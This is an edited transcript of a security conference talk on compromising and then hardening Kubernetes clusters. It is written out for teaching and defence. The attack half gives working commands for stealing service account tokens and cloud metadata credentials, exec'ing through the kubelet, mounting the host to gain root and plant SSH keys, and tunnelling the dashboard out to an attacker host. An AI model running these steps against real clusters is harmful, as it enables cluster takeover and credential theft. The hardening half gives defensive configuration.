Securing a Kubernetes Cluster the Hacker’s Way

YouTube video

While Kubernetes offers new and exciting ways to deploy and scale container-based workloads in production, many organizations may not be aware of the security risks inherent in the out-of-the-box state of most Kubernetes installations and the common practices for deploying workloads that could lead to unintentional compromise.

Join Brad Geesaman, the Cyber Skills Development team lead at Symantec, on an eye-opening journey examining real compromises and sensitive data leaks that can occur inside a Kubernetes cluster, highlighting the configurations that allowed them to succeed, applying practical applications of the latest built-in security features and policies to prevent those attacks, and providing actionable steps for future detection.

The hardening measures taken in response to the attacks demonstrated will include guidelines for improving configurations installed by common deployment tools, securing the sources of containers, implementing firewall and networking plugin policies, isolating workloads with namespaces and labels, controlling container security contexts, better handling of secrets and environment variables, limiting API server access, examining audit logs for malicious attack patterns, and more.

About Brad Geesaman

Brad was recently the Cyber Skills Development Engineering Lead at Symantec Corporation, where he supported the operations and delivery of ethical hacking learning simulations on top of Kubernetes in AWS. Although he spent several years as a penetration tester, his real passion is educating others on the real-world security risks inherent in complex infrastructure systems through demonstration, followed by practical, usable advice on detection and prevention.

The GitHub repo that all the demos are being run out of is in a separate window for me; you can also pull it up in front of you if you're far back and not able to see the text, or if it's going by a little too quickly. I apologize that I have to go through this so fast, but I have so much to show you, so this is more of an index, so to speak: you can go back and dive in deep at your leisure.

A little bit about me: formerly a penetration tester and consultant, spending the last five or six years using the cloud almost exclusively and designing ethical hacking simulations, or capture-the-flag exercises. For the past year at my former company, we've been running capture-the-flag exercises on top of Kubernetes inside AWS. That sounds crazy, and it is a little bit, but we worked very hard to make it a success. In the past few months I've spent a lot of time looking at as many clusters as I could, researching Kubernetes security and policy, and that body of research is what I want to share with you today. Over the past five months I've installed a few clusters; I've even dreamt that I was installing a cluster while asleep, which was very surreal. By show of hands, who has a cluster, or uses an installer, that's listed here, with one of those versions or similar? Okay, a fair number of you. Welcome. How many of you run your own distro, rolled your own? Brave souls. Awesome. It'll still apply to you, I promise.

The biggest takeaway from a security perspective, looking at all of these installation mechanisms, is that a malicious user with a shell, by default (I'm saying "default" on purpose), can very possibly, almost very likely, exfiltrate source code, keys, tokens, and credentials; elevate their privilege inside the cluster from a non-privileged state to a privileged state, which often then leads to root access on the underlying nodes; and, bullet point number four, which is probably the most interesting and hasn't been talked about as much, really expand the blast radius to your entire cloud account in some situations. I hope to get to that quickly enough to cover it in its entirety.

The goals of this talk: raise awareness of those high-risk attacks in as many installers and distributions as possible, so that everyone has that knowledge; demonstrate the attacks live (I'm not brave enough, and don't type quickly enough, to type live, so these are recorded typing sessions, which also gives you something to take home and examine); and finally, provide some hardening methods for those specific attacks, plus additional guidance that goes a few steps beyond that.

So, like Morpheus, I'm beginning to believe. I'm beginning to believe that high system complexity means that for users who are new to a project, getting it to work from an operator's perspective is hard enough. There's such a wide range of new terminology, tools, and mechanisms that most people use the defaults the first time through: "Look, they probably know better than me. I'm just going to accept the defaults and go see how it works." But defaults tend to have inertia. Defaults in use early tend to stay in use, and systems hardened late tend to break. As I was going through all the clusters, I was running into this left and right. So my belief is that having default values be secure early on in a project, in how you're distributing your source code, has positive downstream effects for the community. And when something like Kubernetes literally blows up with widespread adoption, that inertia is big, and it's real.

And that leads us into what I call a security capability gap. I struggled with a name for this, but basically the community at large is somewhat behind the major dot releases as they come out; maybe you're between 1.5 and 1.7. Most mortals can't deploy a brand-new Kubernetes release overnight, though most installers and container-as-a-service offerings are keeping up. The trick is that security capabilities and features are arriving in the newer releases. If you're still on 1.5 or 1.6, RBAC is really rough for you, but in 1.7 and 1.8 it's been baked in and battle-tested. It's tough, because you have to keep up with those ever-fast-moving releases, and it's up to you to add additional security hardening. If you're on 1.6 or 1.7, don't despair; it just needs a lot of elbow grease.

The things I want to talk about today are not extremely in-depth, esoteric attacks or kernel-level exploits. I'm talking about low-hanging fruit. I believe I found enough of it to share with you, and that's enough for a start. I want to raise the bar with just the basics: image safety, RBAC, network isolation. Just doing those things and enforcing those basic controls that already exist inside clusters.

So when you go to harden some clusters, what are the challenges? A lot of folks like to use DISA STIGs or CIS benchmarks as a way to assess the security posture of a cluster. At the operating-system level, those benchmarks don't take into account the workload running on top: they check that passwd and group files have the proper permissions, but they don't know anything about Kubernetes. Conversely, the CIS Kubernetes benchmark doesn't take the OS into consideration, nor how the installer places things, where it puts them, and where it grabs them from the cloud provider. So properly hardening your Kubernetes cluster is highly dependent on your environment, your add-ons, and your plugins, and the defaults are very often not enough. There are a lot of knobs you have to tweak, and we're going to go through some of them.

Something I like to call attack-driven hardening: this is just how I think; it's been built into me as a pen tester. Every time I look at a system, I try to reason about its security posture this way, in progressive steps. From where I am, what can I see, do, or access next? I pick one of the most plausible methods and say: all right, assume that happened. Now what does it look like? What can I see, do, or access next? I repeat until it's game over, until the worst data is gotten and extracted, and then I work backwards and harden as I go. It's basically quick-and-dirty attack modeling.

Everybody here today can take on the persona of the external attacker. If you're looking at a cluster, these are the methods you think of right off the bat. Are you going to get SSH access to the nodes? Maybe, but not likely. Go through the API server? Also not likely; you don't have credentials for either of those. But what about getting a shell in a container inside the cluster? That's where it gets interesting. The three approaches I came up with right off the bat are: exploiting an application running in an exposed container (that's hit or miss; not all apps are extremely vulnerable with a remote code execution), tricking an admin into running a compromised container (that's interesting), or compromising a project developer, compromising their GitHub keys or their Docker registry keys and modifying the project's images and binaries. Throughout this research I did find somebody's credentials in a git commit by accident; I was just looking at code. After I reported it to them, they said it was indeed their company's credential with the ability to push to Quay. So that is a real threat: protect your keys. Which is easier? I'm going to pick on number two today: tricking an admin.

I've written a couple of blog posts, but I've read thousands, and I found a pattern. They say: here's something really complicated; use my custom images; hey, here's my Dockerfile, everything's on the up and up. And in those instructions: kubectl create -f from that URL, slam all these pods and services in, then figure it out and see what happens. I like to think kubectl create -f <url> is the new curl | bash, because it really is, and it's often worse, because now it's distributed across thousands of nodes.

I said this is about hacking and hardening, so let's make with the hacking. For the rest of the attack structure, this is my 3D diagram of a sacrificial cluster. In the lower left you have the master node; in the upper right you have two workers. Very straightforward, very simplistic. We've got a couple of pods running (not all are represented here, just the ones we care about in this case), and we have the metadata API represented as that yellow block up there.

So, my handy-dandy little attacker icon here: if he's able to exploit the vulnerable app in the default namespace and get a shell, can they install custom tools, and by doing so prove internet access? That's something penetration testers always love to have when pulling down their toolsets. Can I install curl and netcat? And can I pull down the kubectl binary, put it somewhere, and run it? That's always interesting.
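The tool-install step he describes might look something like this from a shell inside the compromised pod (the release version and file paths here are illustrative, not taken from the talk):

```shell
# Confirm outbound internet access and install basic tooling
apt-get update && apt-get install -y curl netcat-openbsd

# Pull down a kubectl binary into a writable, executable location
curl -sLo /tmp/kubectl \
  https://storage.googleapis.com/kubernetes-release/release/v1.8.0/bin/linux/amd64/kubectl
chmod +x /tmp/kubectl
/tmp/kubectl version --client
```

If all of those commands succeed, the pod has unrestricted egress, which is exactly what the later attacks rely on.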

Another look at things: it's not common anymore, but in 1.4 and 1.5, a lot of the installers back then (or if you rolled your own) might still have had the insecure bind address on the API server. That's a big no-no, because there's no authentication or authorization on it; it's a direct path to cluster-admin. Notice that little red triangle: that means a bad day, whenever you see a red triangle.

Whenever you're doing a penetration test and you break into that first system, the first thing you ask is: what does the world look like? I have no idea where I am; I'm running scanning tools, just throwing packets everywhere. Well, in a distributed system where everything is based on APIs, that enumeration is just a couple of curl commands now. If I hit cAdvisor, Heapster, the kubelet, Prometheus's node-exporter, kube-state-metrics, any of those, it's just "tell me about yourself," and they answer: here's everything about myself, what things are named, where they're running, what their pod hashes are. Everything is right there.

That leads me to my first demo. Because we have kubectl, because we have that access, we can list the nodes and see the IP address of one of them. cAdvisor runs on port 4194, and if you hit its metrics endpoint, cAdvisor will happily tell you everything about what's running on that system, including the pod names (which are always randomized), the namespace they're in, the container names, the versions, the SHA hashes. Basically everything that's running. There's my redis; we'll get to that guy later.
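A sketch of that cAdvisor enumeration, assuming an older cluster exposing port 4194 (the node IP is a placeholder):

```shell
# List nodes with the kubectl we downloaded, then query cAdvisor directly
/tmp/kubectl get nodes -o wide
NODE_IP=10.240.0.5   # placeholder: one of the node IPs from the output above
curl -s http://${NODE_IP}:4194/metrics | grep container_start_time_seconds
# The metric labels leak pod names, namespaces, container names, and image hashes
```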

This one I think is fairly well known, but it's incredibly important: the default service account token. It's located in this directory and auto-mounted in a lot of clusters, and specifically before RBAC, this is a really big deal. If you have RBAC enabled, we'll get to some of that. But if you can run kubectl ("kube control", sorry, I was corrected this morning in the keynote), you can get pods, get secrets, and you're cluster-admin. Again: red triangle, bad day. So we can install some tools, download the kubectl binary, validate that we can hit the API, confirm we have the service account token mounted, get pods, list all the secrets, look for the good ones, and dump their contents. Four or five curl commands, and we've escalated.
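The escalation sequence he shows boils down to something like this (the in-cluster API address is the standard service name; secret names vary by cluster):

```shell
# The auto-mounted default service account token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# Pre-RBAC, this token is often effectively cluster-admin
curl -sk -H "Authorization: Bearer ${TOKEN}" \
  https://kubernetes.default.svc/api/v1/namespaces/kube-system/secrets

# Or with the downloaded kubectl, which picks up the mounted token automatically
/tmp/kubectl get pods --all-namespaces
/tmp/kubectl get secrets --all-namespaces
```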

Next, we want to look at the Kubernetes dashboard. Raise your hand if you run the Kubernetes dashboard. Awesome. Are you running version 1.7 or higher of the dashboard? Yeah? Okay. So as you know, there's no authentication on it; it needs protection. If you're in this vulnerable app pod, most often you can hit it by its service name; you don't even need to know the IP address. But that's kind of tough: how do I actually use it? It's a big web UI, not just a curl command. We can forward a port over SSH; that's really two commands away. So: yes, we're inside Kubernetes; let me get the service; yup, the dashboard's there; let me get the IP address by pinging it (a cheap way to do it without having dig installed); and then SSH out to my bad IP, my attacking system, saying: take remote port 8000 and funnel it down into the dashboard. On that remote attacking host, you go to localhost:8000, and the dashboard is in front of you.
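The two-command tunnel might look like this (BAD_IP stands in for the attacker's host; the service name follows the usual dashboard deployment defaults):

```shell
# Resolve the dashboard service without dig installed
ping -c1 kubernetes-dashboard.kube-system.svc.cluster.local

# Reverse-forward remote port 8000 on the attacking host into the dashboard
ssh -N -R 8000:kubernetes-dashboard.kube-system.svc.cluster.local:80 user@BAD_IP
# On BAD_IP, browse to http://localhost:8000: the dashboard appears, no auth required
```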

What about tampering with other services inside the cluster? As you can see, there's a vote app and a redis: the azure-vote-front and azure-vote-back application. It's a very simple Python app with a redis backend; you can vote for cats or dogs. Hack the vote: we're going to tamper with it.

I grew up with cats, so I'm going to pick on cats today. We get the azure-vote-back service and its IP; yup, port 6379 is open. Let's install the redis CLI. Can we connect to it? Yup. We can dump the keys. I'd like cats to be a thousand, so let's set cats to a thousand and go hit that web front page. I apologize that it's in curl, but you'll see it at the very bottom there: cats is one thousand, dogs is six. Take that and extrapolate it to any unauthenticated service inside the back end of your cluster; redis is just one I picked because it's simple and straightforward to demonstrate.

Here we get a bit more interesting: the kubelet "exploit." How many of you have heard of this attack method? Well, it's basically not an exploit, which is why it's in air quotes: the kubelet API allows this, and in clusters without certain settings, the kubelet will let anybody connect to this endpoint, exec into containers, ask for logs, and do other nefarious things.
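The redis tampering steps, sketched (the service name comes from the demo; resolving it by service DNS name is an illustrative shortcut):

```shell
apt-get install -y redis-tools   # provides the redis CLI

# Connect to the unauthenticated backend by its service name
REDIS_HOST=azure-vote-back
redis-cli -h ${REDIS_HOST} -p 6379 KEYS '*'

# Hack the vote
redis-cli -h ${REDIS_HOST} -p 6379 SET cats 1000
redis-cli -h ${REDIS_HOST} -p 6379 GET cats
```

A simple ingress NetworkPolicy on the backend, covered in the hardening section later, stops this cold.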

So what we're going to do is ask the kubelet to run a command in a given container on it. With one curl command we can say: hey, I want you to exec, list this directory inside that pod right there, running on that node. We get the node IPs; port 10250 is the read-write kubelet API port, and 10255 is the read-only metrics port. When we hit the runningpods method, we cut the output into a file so it's easier to look at. It's a nice JSON object, again very much like cAdvisor: everything the kubelet is running, complete with the hashes, the namespace, the pod name, and the container name, which is important for the next command. There you go: azure-vote-front, that's the one we're going to pick on. We're going to look at the web directory of the azure-vote-front app.

run is the action, default is the namespace, azure-vote-front plus the random suffix is the pod name, and then comes the container name. You just say: hey, run this command, list the root directory.
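Put together, the kubelet calls look roughly like this (the node IP and the pod-name suffix are placeholders):

```shell
NODE_IP=10.240.0.6   # placeholder worker IP

# Enumerate everything the kubelet is running (read-write API, port 10250)
curl -sk https://${NODE_IP}:10250/runningpods/ > pods.json

# Exec into a container: /run/<namespace>/<pod-name>/<container-name>
curl -sk -X POST \
  "https://${NODE_IP}:10250/run/default/azure-vote-front-1234abcd/azure-vote-front" \
  -d "cmd=ls -la /"
```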

/app looks like an interesting directory; let's look in there. main.py looks interesting. We've just extracted the source code for this super-sensitive application.

Accessing the etcd service directly: most clusters don't expose etcd to the workers, but some install a separate etcd instance to support Calico or a network-policy backend, and in some cases that's exposed with no TLS, authentication, or authorization. In that case you may be able to defeat the system that's storing your network policies. Even if there are network policies in place, if you can hit that etcd endpoint, you can go in and tell Calico to forget all of its network policies, and Calico will happily remove them from the nodes in your cluster. This is pretty rare, but I'll get to the frequency of it. Now, any of those methods I showed for getting a kubelet or a service account token may let you schedule a pod that mounts the host's filesystem, add your own SSH key, and then SSH into the node.

Now we're getting into the multi-step parts. What we're going to do is get the node name as it's represented inside Kubernetes, and the external IP address of that node so we can SSH into it later. We create a very simple pod specification (I pick on nginx because it's based on Debian), make sure privileged is true, and mount the root filesystem path.

Here's what it looks like with the nodeSelector in there, so it gets scheduled on that one single node. We run it, exec into it, chroot into the mounted root filesystem, and now we're on the host as root. Add our own SSH key, back on out, and then SSH directly in.
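A minimal pod spec in the spirit of the one demonstrated (the node name and pod name are placeholders):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
spec:
  nodeSelector:
    kubernetes.io/hostname: worker-1   # placeholder: pin to the target node
  containers:
  - name: shell
    image: nginx        # Debian-based, so common tools are easy to add
    securityContext:
      privileged: true
    volumeMounts:
    - name: rootfs
      mountPath: /rootfs
  volumes:
  - name: rootfs
    hostPath:
      path: /           # mount the node's entire root filesystem
```

Then `kubectl exec -it attack-pod -- chroot /rootfs /bin/bash` puts you on the host as root, where you can append a key to root's authorized_keys. A PodSecurityPolicy that forbids privileged pods and hostPath mounts blocks this class of attack.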

So if you're root and able to run Docker containers under the hood that Kubernetes doesn't know about, running backdoors and such, it's a pretty bad day.

The last classification of attacks I want to talk about is accessing the metadata API. Who's heard of 169.254.169.254? Okay. One of the things it does is give an instance data about itself: what region it's in, its bootstrapping information, which in some of these installers' cases includes sensitive S3 paths or kubeadm join tokens. Right then and there, that's a bad day. But most of these cluster installations also attach IAM instance roles to the workers and masters, and available via that metadata API are those AWS keys. They rotate every few hours, but they're just a curl command away. So let's curl those from that vulnerable pod we talked about. We run one command and get keys that are valid for a couple of hours, export them into the shell on our attacking system, and now we have whatever permissions are available to those keys. Describe-instances: list all the instances in your entire account, not just your cluster, everything in that AWS account. And describe the instance attribute called user-data on every single instance in your entire cloud account. How many of you have sensitive things in user data, on things that are not Kubernetes? Maybe, possibly? That's why this blast radius is pretty bad: you might not compromise your Kubernetes cluster, but that web server over there that bootstraps with a GitHub key or something delivered via user data? You can reach over and grab it. That's a bad day for the other administrators.
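The metadata-API credential theft he demonstrates is essentially this (region and instance ID are placeholders):

```shell
# From inside the pod: discover the instance role name, then pull its keys
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/${ROLE}

# On the attacking system, export the returned AccessKeyId, SecretAccessKey,
# and Token into the environment, then:
aws ec2 describe-instances --region us-east-1
aws ec2 describe-instance-attribute \
  --instance-id <instance-id> --attribute userData
```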

When I talk about IAM permissions, the masters and workers typically have something that looks like this: describe* for the workers; the masters have ec2:*, ECR permissions to pull images from AWS ECR, and some S3 capabilities. But we really want that ec2:*, don't we? That means any AWS EC2 command is available to us. So how would we get it? We need to make sure the curl originates from the master. There are a couple of ways of doing that: compromising an existing pod running on the master, which is kind of tough, or using one of the two issues we just talked about. If you find a service account token, just ask the API server; or just ask the kubelet running on the master to run a command for you inside a pod. It looks like this: basically wrapping a curl command this way, or this way. Notice how close they are; it's essentially the same thing, just asking somebody different to do it.

And the final example of why this is a bad day: if you have ec2:*, you can create a new VPC, a new security group, a new SSH key, and a new instance, snapshot every volume from every single instance in your entire cloud account, and then mount those snapshots on that instance. That can be automated, as you can imagine, within five or ten minutes. It's a pretty bad day. And if you're on the master, you might also be able, in some cases by default, to list everything in AWS S3. Who stores logs and sensitive backups in S3? It's a bad day.

For attacks 9 and 10 I'm switching gears to GKE and GCE. In GKE specifically, there's an attribute, much like the user-data endpoint on the AWS API, called kube-env. It's what the kubelet uses to bootstrap itself; it gets its keys from it, and it's often reachable directly.


So here's that listing. Part of the security feature is that you have to pass a header into Google's API to prove you're doing it deliberately, not through a server-side request forgery. configure.sh looks interesting, kube-env looks interesting, user-data looks interesting, so we can go poke at those. This references the kube-env, and right there you see there's a lot of good stuff: we know what the release is, we know where it's getting things from, we know the IPs of the master, and we can see the kubelet's information about where it gets its key, cert, and CA PEM. This wall of text is what I call the one-shot: if you get a shell in a container inside GKE, you can become the kubelet with this one awesome bash hunk of junk. Pull down a kubectl, grab the kube-env from the metadata API, strip out the parts, base64-decode them into the kubelet's authentication credentials, and then run kubectl to list all the pods in all the namespaces.
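The "one shot" condensed to its essential steps (the kube-env field names and the extraction commands here are an approximation of the recorded demo, not a verbatim copy):

```shell
# Grab kube-env from the GCE metadata API (the header proves it isn't SSRF)
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env" \
  > kube-env

# Extract and base64-decode the kubelet's credentials
grep '^KUBELET_CERT' kube-env | awk '{print $2}' | base64 -d > kubelet.crt
grep '^KUBELET_KEY'  kube-env | awk '{print $2}' | base64 -d > kubelet.key
grep '^CA_CERT'      kube-env | awk '{print $2}' | base64 -d > ca.crt

# Become the kubelet (the master IP also appears in kube-env)
kubectl --client-certificate=kubelet.crt --client-key=kubelet.key \
  --certificate-authority=ca.crt --server=https://<master-ip> \
  get pods --all-namespaces
```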

Boom. One thing of note: you probably want to get the secrets, right? Well, the kubelet doesn't have the ability to list all the secrets, but it can pull a secret if it knows its name. The best way to get that is to output get pods in YAML, either all pods or one you know of specifically. I used the dashboard here because I know it has the cluster-admin token. You say: hey, dump the pods back as YAML, and it will tell you each mounted secret by name. Now you know what it is.

You can go get that secret directly; in this case it's the default service account token in the kube-system namespace.

What we do with that is the same thing as before, so I'm going to skip this part for the sake of speed: mount the host filesystem, add an SSH key, and SSH in.

The second method through the GKE/GCE metadata API: just like EC2 assigns permissions to instances, GKE does the same thing. They give you an IAM token and instance scopes, and that IAM token lets you talk to the Google Compute API and run actions on things inside the scope of that project. One of the things you can do, of course, is enumerate all the instances, but you can also use a really handy API method for adding an SSH key. If you have these privileges and this token, you can be on worker-1, curl for the token, hit the API saying "hey, add my SSH key to worker-2," and Google will happily do it if you're authenticated. Then you can SSH into worker-2, or anything inside the scope of that project. If you're running multiple clusters, that means any node in any cluster in that same project. So we get the external IP, so we know what to SSH into when we're done, and we list the instances in the project.

Okay, we page through it a little so you can see how much information is here. A lot of good stuff: IP addresses, external NATs, things like that.

The user data, the kube-env, for all the instances in the project: you're doing the equivalent of an aws ec2 describe-instances, but inside Google. So I go ahead and do the same thing with describe-instance, seeing everything about this one node, so I can get its fingerprint, which is needed for the API call I'm about to form. Forgive me, I use curl and bash to keep it simple, which makes it a little ugly, but you don't need to download any extra tools; there's no malware running here, it's all curl and bash. What we do is make a POST body with the fingerprint we just pulled, add my SSH key (as you can see, the public key), and POST it to that API.

I'll show you what it looks like rendered: that's the final POST body. "Google, go add me to worker-2." It happily does it, and we're root on that second node.

Again: a bad day.

How prevalent are these issues? This is what compelled me to do this talk, and I want to stress something: this is not the entire security posture of every one of these clusters. It's a narrow band of the items I've identified here, and it says nothing about the rest. These are the specific versions I tested; note those versions, because I started testing in August and September. We'll get to what the latest releases look like. So it's prevalent; you'd admit it's not uncommon. But don't despair: we can do it, we have the technology.

For attacks seven through ten, if you're running in AWS, I recommend what's called a metadata proxy: something that makes sure that when a pod goes to 169.254.169.254, it's allowed to. kube2iam and kiam both worked in my testing to take care of this in AWS. For GCE there's the GCE metadata proxy, plus "these steps" (I apologize, those words are actually masking Google's GKE hardening blog post, which was released very recently; that is an incredibly important link and a late addition, really useful for blocking the attacks I just showed). If you're running network policy on 1.8, egress blocking is also a valid method, and if you're on older versions of Kubernetes like I was and you're using Calico, you can use calicoctl under the hood to get the same effect; it's not through the Kubernetes API, but you can do it.

Protect the kubelet: authorization-mode webhook. If you don't see that setting, your kubelet is probably allowing that kubelet exploit. And isolate workloads: remember the hack-the-vote, changing it to cats? A very simple network policy literally stops that attack in its tracks. You say: every pod that has the label azure-vote-back only gets ingress from azure-vote-front.

This is almost a 99% perfect drop-in: if you're running the dashboard and you have network policy ingress support, drop this in and it will protect your dashboard.

It's a bit of a trick: we have a podSelector that matches the kubernetes-dashboard only, but there are no rules, which by default means a default deny. This does not block kubectl proxy, which works through the API server; it blocks access from pods, which have no business talking to the dashboard.

Restricting the default service account token: RBAC, plus the Node authorizer and NodeRestriction. And I want to stress something: you have to exec into the pods and verify this. It's very easy to miss, or to do incorrectly, if you're messing with RBAC. And monitor all RBAC audit failures: you either have a misconfiguration of your app, or somebody's attacking you and they're failing.
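The drop-in he describes is, in spirit, a policy that selects the dashboard pod and lists no ingress rules (the label follows the common dashboard deployment; adjust it to your cluster):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-dashboard-ingress
  namespace: kube-system
spec:
  podSelector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  policyTypes:
  - Ingress
  # No ingress rules listed: all pod-to-dashboard traffic is denied.
  # kubectl proxy still works because it goes through the API server.
```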

And I'm happy to say that in 1.8 and above, with egress supported natively, this policy works in your clusters as a really nice default-deny platform. Apply it to every single one of your namespaces: ingress and egress, nothing is allowed by default in the namespace, nothing except kube-dns lookups to start. Put this down as a cluster administrator, and then deploy the network policy for your workloads with the workload lifecycle: when you're deploying azure-vote-front and back, apply the network policy that allows those two to work together at that time.
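A default-deny policy in that spirit might look like this (the DNS carve-out below simply allows port-53 egress anywhere; tighten it to your kube-dns pods if your network plugin supports it):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
spec:
  podSelector: {}        # applies to every pod in the namespace
  policyTypes:
  - Ingress
  - Egress
  egress:
  - ports:               # permit DNS lookups only; all other egress is denied
    - protocol: UDP
      port: 53
    - protocol: TCP
      port: 53
```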

And I'm happy to say that throughout these last five months I've worked with every single one of these projects directly, disclosing the issues I found; in a lot of cases fixes were already in progress, already in flight. With newer releases, Kubernetes 1.8, and a little elbow grease, we can look like this: we can literally wipe out this classification of vulnerabilities for good and make the infrastructure nice and boring.

Two tools I want to tell you about. kube-atf is a tool I wrote to help automate the creation, validation, and destruction of all these clusters in a sane way, because I spun them up every day, ran them for two hours, and threw them away, over and over. And Heptio's Sonobuoy: I wrote a plugin as basically a proof of concept, and there's so much more you can do with it. I currently run a CIS benchmark using Aqua Security's kube-bench; by deploying that plugin into Sonobuoy, we can continually scan our nodes for posture assessment in a very sane way.

So, even more security hardening tips: this is where it goes above that low-hanging-fruit line on the apple tree I showed you; this is where it gets a little more advanced. Let's assume you've done all the things I just suggested. Here's what you want to look for. Verify that all your settings are properly enforced: I can't tell you how many times I thought I'd hardened something, went to validate it, and found I hadn't done it quite correctly, didn't get that label just right, et cetera. It's important that you validate. Keep up with the latest versions if you possibly can, because useful security features land in every dot release. Audit at all the levels you can: the OS, the runtime, and Kubernetes; I like the CIS benchmarks. And log everything outside the cluster; that's important.


Practice safe image security; there are all sorts of good talks, blog posts, and tools that help with that. I already covered the Kubernetes components a bit, but the network security policy bit is incredibly important now that we have ingress and egress; use that to your advantage. You can mask a lot of attacks just by not having network access. Protect your workloads by default by saying no ingress and egress, and then apply what you want to allow: it's allow-listing, not block-listing. And I added this the other day: consider a service mesh. There are a lot of benefits beyond all the things it does for your application, visibility, and mutual TLS: it makes your workloads more isolated when they talk to each other, just by default, by how it works.

I think some folks have talked about this before, but namespaces per tenant are really good when you combine them with that default-deny policy set. If you have a microservice here, a microservice here, and a microservice here, they’re all default-deny: the microservices can’t talk to each other until you allow them. You can be explicit. This is something we learned from the capture-the-flag exercises: make sure that CPU and RAM limits are on all containers (I know disk and network limits are somewhere down the line) to prevent malicious actors from simply filling the disk or consuming all the RAM with their tools. Something people don’t talk about, which I think is kind of interesting, is your pod specs: if you’re running a pod that has no business talking to the API server, don’t mount the service account token. You don’t need it; don’t put it there, even if it has no permissions. Defense in depth. And use a pod security policy to enforce container restrictions and protect the node; that’s something that’s going to mature over the next few releases. A shout-out to some of the vendors I talked to, and this is kind of an important note: container-aware malicious activity and behavioral detection capabilities are incredibly important for stopping the initial attack right where it started, at the syscall level. A shell cannot happen, a curl cannot be downloaded, a binary cannot be exec’d, et cetera; you stop the attack right then and there. Number three on the miscellaneous security bit: separate cloud accounts, projects, or resource groups for different workloads or different clusters. I think a one-to-one mapping is safe for now; there are just too many ways to hop across. And don’t run dev and test workloads in clusters at the same time as production, or in the same place as production, again because of so much opportunity for crossover. Then, depending on your regulatory requirements, use separate node pools for separate workloads, using annotations to make sure sensitive stuff happens here and non-sensitive stuff happens over there.
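Two of the pod-level recommendations above, resource limits on every container and not mounting the service account token, can be sketched in a single pod spec. The names and limit values are illustrative assumptions, not prescriptions:

```yaml
# Sketch: a pod with resource limits and no service account token mounted.
apiVersion: v1
kind: Pod
metadata:
  name: web                              # example name
spec:
  automountServiceAccountToken: false    # pod never talks to the API server
  containers:
  - name: web
    image: nginx:1.13                    # hypothetical image
    resources:
      requests:                          # scheduling baseline
        cpu: 100m
        memory: 128Mi
      limits:                            # hard caps a hijacked pod can't exceed
        cpu: 500m
        memory: 256Mi
```

With limits in place, a compromised container cannot starve its neighbors of CPU or RAM, and with no token mounted there is nothing for an attacker in the pod to replay against the API server.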

Here are some of the tools I came across that I found notable, which you might want to take advantage of when you’re looking at auditing. The CIS Benchmark has been updated for 1.8, and it’s a great resource; kube-bench implements it nicely and is very straightforward to run. The CIS OS and runtime hardening stuff from dev-sec, and ansible-hardening from Major Hayden and the other folks from OpenStack, are really good at making sure the underlying posture of your systems is great. And then kubeaudit, which I’m looking forward to (I think that’s the next talk), and Sonobuoy; I think there’s a lot of room for growth in this space.

Notable security features in 1.8: NetworkPolicy and PodSecurityPolicy. Whitelisting the egress is huge, and volume mount whitelisting prevents a lot of those node access bits I was just showing you.
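The volume whitelisting mentioned here can be sketched as a PodSecurityPolicy. This is an illustrative example only (the policy name and rule choices are assumptions); in the 1.8 era, PodSecurityPolicy lived in the `extensions/v1beta1` API group, and notably, `hostPath` is absent from the volume list, which blocks the node filesystem access tricks described earlier.

```yaml
# Sketch: a restrictive PodSecurityPolicy with a volume whitelist.
apiVersion: extensions/v1beta1   # PSP API group as of Kubernetes 1.8
kind: PodSecurityPolicy
metadata:
  name: restricted               # example name
spec:
  privileged: false
  hostNetwork: false
  hostPID: false
  runAsUser:
    rule: MustRunAsNonRoot
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  fsGroup:
    rule: RunAsAny
  volumes:                       # whitelist; hostPath is deliberately omitted
  - configMap
  - secret
  - emptyDir
  - persistentVolumeClaim
```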

So, in closing: as a community, we’re all responsible for the safety and security of the applications that power the world. Let’s make that foundation secure by default and incredibly boring.

The question is: what’s the number one thing? All of the above, but the first thing is enabling RBAC. A huge classification of those things doesn’t happen in a properly configured, RBAC-enabled cluster. The rest you still have to do, because notice how all the things I was doing required no special tools; it was just the access that you have. Combining that with network policy shuts off everything to start. You might have a vulnerable kubelet, the kubelet exploit, but if you have an egress policy you can stop that network access, assuming you put it on every namespace. So you can mitigate and work around, without having to fix the underlying things, with some clever policies. Did I look at OpenShift? The answer is yes. I wanted to focus on vanilla Kubernetes because, as you know, OpenShift is a slightly opinionated distribution of Kubernetes. The only thing that applies to OpenShift from the things I talked about, by default, is the metadata API. They don’t put anything sensitive in user data, and they don’t put any IAM credentials associated with those workers by default; if you go ahead and do that, then it’s available and they’d need the metadata proxies. But that’s the only thing. I hesitated in lumping it in there because it’s such a different beast compared to how all these were lined up; it’s a little bit of an unfair comparison. But I would highly recommend you look at OpenShift, at least as a reference point for their security model. I have no horse in the race.
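To make the "enable RBAC first" advice concrete, here is a minimal sketch of a namespaced Role and RoleBinding granting only read access to pods. The namespace, role name, and subject are placeholders; RBAC reached the `v1` API group in Kubernetes 1.8.

```yaml
# Sketch: least-privilege RBAC, read-only pod access in one namespace.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: my-app            # hypothetical namespace
  name: pod-reader
rules:
- apiGroups: [""]              # "" means the core API group
  resources: ["pods"]
  verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: read-pods
  namespace: my-app
subjects:
- kind: ServiceAccount
  name: default                # bind to the namespace's default SA
  namespace: my-app
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io
```

With this in place, a compromised pod using that service account can only list pods in its own namespace, which is exactly the "huge classification of those things don't happen" effect the answer describes.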

This guide is part of a series where we bring the best to you; we have made modifications to the original content.
Speaker: Brad Geesaman, Symantec
Attribution Credits: